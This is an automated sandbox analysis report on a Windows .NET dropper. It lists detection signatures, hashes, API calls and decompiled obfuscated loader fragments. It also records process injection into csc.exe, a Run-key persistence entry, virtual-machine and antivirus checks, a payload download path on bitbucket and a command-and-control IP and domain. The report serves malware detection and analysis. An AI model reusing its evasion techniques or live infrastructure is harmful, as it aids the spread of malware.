Windows Analysis Report
3XSXmrEOw7.exe

Overview

General Information

Sample name: 3XSXmrEOw7.exe (renamed because original name is a hash value)
Original sample name: 972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce.exe
Analysis ID: 1573895
MD5: ddce3b9704d1e4236548b1a458317dd0
SHA1: a48a65dbcba5a65d89688e1b4eac0deef65928c8
SHA256: 972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce
Tags: 181-131-217-244, exe, user-JAMESWT_MHT
Infos:

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
Drops large PE files
Injects a PE file into a foreign processes
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 3XSXmrEOw7.exe (PID: 7812 cmdline: "C:\Users\user\Desktop\3XSXmrEOw7.exe" MD5: DDCE3B9704D1E4236548B1A458317DD0)
    • csc.exe (PID: 5980 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.3789474644.0000000009540000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000003.00000002.3786417817.0000000006CD1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000003.00000002.3786964807.0000000007E72000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
Process Memory Space: csc.exe PID: 5980 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

Source | Rule | Description | Author | Strings
3.2.csc.exe.9540000.4.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
3.2.csc.exe.7ef6e08.2.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

              System Summary

              Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\3XSXmrEOw7.exe, ProcessId: 7812, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ElectronArtsCLI
              No Suricata rule has matched

              AV Detection

              Source: 3XSXmrEOw7.exe | Avira: detected
              Source: 3XSXmrEOw7.exe | ReversingLabs: Detection: 28%
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
              Source: 3XSXmrEOw7.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknown | HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.10:49768 version: TLS 1.2
              Source: Binary string: Swvvzalx.pdb source: csc.exe, csc.exe, 00000003.00000003.1598027769.0000000007F6D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3787355907.00000000093B0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.3786417817.0000000006D7E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3790241766.0000000009F30000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.3786417817.0000000006D7E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3790241766.0000000009F30000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: c:\installer\incremental installer7\dev\AutoRun7\Release\autorun7.pdb source: 3XSXmrEOw7.exe, ElectronArtsCLI.exe.0.dr
              Source: Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00415858 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00413800 FindFirstFileA,FindClose
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_0040A0D8 FindNextFileA,FindClose,FindFirstFileA,Sleep,DeleteFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_004151A0 FindFirstFileA,FindClose,GetFileAttributesA,SetFileAttributesA,SetLastError,CopyFileA,GetLastError,SetLastError,GetLastError,GetFileAttributesA,SetFileAttributesA
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00414A00 FindFirstFileA,FindClose,Sleep,Sleep,Sleep,GetFileAttributesA,SetFileAttributesA,DeleteFileA
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00414290 FindFirstFileA,FindClose,FindClose
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00414340 FindFirstFileA,FindClose
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00414380 FindFirstFileA,FindClose,FindFirstFileA,FindClose,CreateDirectoryA,RemoveDirectoryA,Sleep,FindFirstFileA,FindClose,RemoveDirectoryA,Sleep
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00414C50 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_0040AC10 FindFirstFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00414D36 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_004145D0 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00415590 FindFirstFileA,CreateDirectoryA,CreateDirectoryA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00413E20 GetCurrentDirectoryA,FindFirstFileA,FindClose,SetCurrentDirectoryA,FindFirstFileA,FindClose,CreateProcessA,Sleep,SetLastError,CreateProcessA,GetExitCodeProcess,Sleep,Sleep,SetCurrentDirectoryA,GetLastError,FormatMessageA,LocalFree
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00414626 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00417E90 FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00414697 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_004156B5 FindFirstFileA,CreateDirectoryA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00409F7A FindFirstFileA,GetFileAttributesA,SetFileAttributesA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,Sleep,DeleteFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00414F30 FindFirstFileA,FindClose,FindClose
              Source: global traffic | TCP traffic: 192.168.2.10:49762 -> 181.131.217.244:30203
              Source: global traffic | HTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
              Source: Joe Sandbox View | IP Address: 181.131.217.244
              Source: Joe Sandbox View | IP Address: 185.166.143.50
              Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic | DNS traffic detected: DNS query: navegacionseguracol24vip.org
              Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
              Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
              Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49768

              System Summary

              Source: 0.2.3XSXmrEOw7.exe.2310000.1.raw.unpack, CentralIterator.cs | Large array initialization: IterateAdaptableIterator: array initializer size 543744
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | File dump: ElectronArtsCLI.exe.0.dr 979567344
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00413845 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,GetLastError,FormatMessageA,LocalFree
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: String function: 00424A8C appears 161 times
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: String function: 00428B04 appears 54 times
              Source: 3XSXmrEOw7.exeStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
              Source: 3XSXmrEOw7.exeStatic PE information: Resource name: RT_STRING type: PDP-11 demand-paged pure executable not stripped
              Source: ElectronArtsCLI.exe.0.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
              Source: ElectronArtsCLI.exe.0.drStatic PE information: Resource name: RT_STRING type: PDP-11 demand-paged pure executable not stripped
              Source: 3XSXmrEOw7.exeBinary or memory string: OriginalFilename vs 3XSXmrEOw7.exe
              Source: 3XSXmrEOw7.exe, 00000000.00000000.1320237354.00000000005B1000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAutoRun7.exeP vs 3XSXmrEOw7.exe
              Source: 3XSXmrEOw7.exeBinary or memory string: OriginalFilenameAutoRun7.exeP vs 3XSXmrEOw7.exe
              Source: 3XSXmrEOw7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 0.2.3XSXmrEOw7.exe.2310000.1.raw.unpack, CentralIterator.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.3XSXmrEOw7.exe.2310000.1.raw.unpack, DetachedCalc.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.3.csc.exe.800ee68.1.raw.unpack, cGOENDByihghaE21MG5.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, cGOENDByihghaE21MG5.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, hIKm5xdfOG6UqF42bjx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, UuINIkdXDBG5e46ex3q.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, DmgZfxFVftVX4nGpCf.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, DmgZfxFVftVX4nGpCf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal96.evad.winEXE@3/1@3/2
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413845 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,GetLastError,FormatMessageA,LocalFree,0_2_00413845
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040F650 GetModuleHandleA,GetProcAddress,SetLastError,SetLastError,SetLastError,GetDiskFreeSpaceA,0_2_0040F650
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040F900 CoInitialize,CoCreateInstance,MultiByteToWideChar,0_2_0040F900
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004013D0 LoadResource,LockResource,SizeofResource,0_2_004013D0
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeFile created: C:\Users\user\Videos\ElectronArtsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: NULL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: \Sessions\1\BaseNamedObjects\mono1234
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\nbbnv.exeJump to behavior
              Source: 3XSXmrEOw7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 3XSXmrEOw7.exeReversingLabs: Detection: 28%
              Source: 3XSXmrEOw7.exeString found in binary or memory: &Non-Installation typique - Rpertoire par dfaut *Installation avance - Choix du rpertoireInternet Explorer %s est actuellemen
              Source: 3XSXmrEOw7.exeString found in binary or memory: &Non-Installation typique - R
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeFile read: C:\Users\user\Desktop\3XSXmrEOw7.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\3XSXmrEOw7.exe "C:\Users\user\Desktop\3XSXmrEOw7.exe"
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: crowdstrikeceoisextragay.dllJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: sentinelisabadedrtrynexttimemaybe.dllJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: 3XSXmrEOw7.exeStatic file information: File size 2605056 > 1048576
              Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_CURSOR
              Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_BITMAP
              Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_ICON
              Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_MENU
              Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_DIALOG
              Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_STRING
              Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_ACCELERATOR
              Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_GROUP_ICON
              Source: 3XSXmrEOw7.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x224000
              Source: 3XSXmrEOw7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: Swvvzalx.pdb source: csc.exe, csc.exe, 00000003.00000003.1598027769.0000000007F6D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3787355907.00000000093B0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.3786417817.0000000006D7E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3790241766.0000000009F30000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.3786417817.0000000006D7E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3790241766.0000000009F30000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: c:\installer\incremental installer7\dev\AutoRun7\Release\autorun7.pdb source: 3XSXmrEOw7.exe, ElectronArtsCLI.exe.0.dr
              Source: Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              Source: 0.2.3XSXmrEOw7.exe.2310000.1.raw.unpack, DetachedCalc.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.3.csc.exe.800ee68.1.raw.unpack, cGOENDByihghaE21MG5.cs.Net Code: Type.GetTypeFromHandle(XveeF7XAyEDpVRQtyQ3.pedaXVSaEJ(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(XveeF7XAyEDpVRQtyQ3.pedaXVSaEJ(16777250)),Type.GetTypeFromHandle(XveeF7XAyEDpVRQtyQ3.pedaXVSaEJ(16777305))})
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, cGOENDByihghaE21MG5.cs.Net Code: Type.GetTypeFromHandle(XveeF7XAyEDpVRQtyQ3.pedaXVSaEJ(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(XveeF7XAyEDpVRQtyQ3.pedaXVSaEJ(16777250)),Type.GetTypeFromHandle(XveeF7XAyEDpVRQtyQ3.pedaXVSaEJ(16777305))})
              Source: 0.2.3XSXmrEOw7.exe.2310000.1.raw.unpack, CentralIterator.cs.Net Code: MatchIterator System.Reflection.Assembly.Load(byte[])
              Source: 3.2.csc.exe.95a0000.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 3.2.csc.exe.95a0000.5.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 3.2.csc.exe.95a0000.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 3.2.csc.exe.95a0000.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 3.2.csc.exe.95a0000.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: 3.3.csc.exe.82860e8.0.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 3.3.csc.exe.82860e8.0.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 3.3.csc.exe.82860e8.0.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 3.3.csc.exe.82860e8.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 3.3.csc.exe.82860e8.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: 3.3.csc.exe.82360c8.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 3.3.csc.exe.82360c8.4.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 3.3.csc.exe.82360c8.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 3.3.csc.exe.82360c8.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 3.3.csc.exe.82360c8.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, EQdDeAXU1XRqnCmSnUG.cs.Net Code: FaQgOk6ZkC
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, EQdDeAXU1XRqnCmSnUG.cs.Net Code: vl0W5T2oSe
